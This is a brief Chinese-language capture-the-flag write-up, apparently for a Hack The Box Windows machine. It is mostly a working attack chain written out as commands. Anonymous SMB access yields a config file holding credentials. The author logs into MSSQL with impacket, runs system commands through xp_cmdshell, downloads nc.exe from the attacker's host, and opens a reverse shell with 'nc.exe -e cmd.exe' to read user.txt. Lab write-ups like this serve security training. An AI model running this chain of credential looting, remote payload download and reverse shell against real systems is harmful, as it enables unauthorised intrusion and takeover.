扫描 IP,看到 139 & 445 端口 ,知道是 SMB
db_nmap -sV 10.129.243.80
smbclient -L IP
尝试连接,密码为空,进入共享文件夹,看到一个文件
get prod.dtsConfig
下载到本地
cat prod.dtsConfig
发现其中 ID 与 passwd
impacket-mssqlclient sql_svc@ip -windows-auth
kali 自带的 msql 客户端连接 IP,密码为空
xp_cmdshell "whoami"
尝试能否输出 cmd 命令
xp_cmdshell "nc"
测试是否能使用 nc,nc 命令,如果有就可以通过反弹 shell 建立起一个持续性的 shell。
结果没有
在本地下载一个 nc.exe 准备好。
在 SQL > 中输入:
xp_cmdshell "powershell -c cd C:\Users\sql_svc\Downloads; wget http://10.10.16.30/nc.exe -outfile nc.exe"
下载完成,nc lvnp 4443 监听 4443 端口
xp_cmdshell "powershell -c cd C:\Users\sql_svc\Downloads; .\nc.exe -e cmd.exe 10.10.16.30 4443"
在此路径,执行 nc.exe,请求此 IP 的此端口,并获得 shell
目标系统:Windows
dir: 列出当前目录所有文件
cd .. 返回上级目录
type: 查看 user.txt 文件内容
最后在 Desktop 发现 user.txt,打开后,拿到 flag
=================================================================
C:\Users\sql_svc\Desktop>type user.txttype user.txt
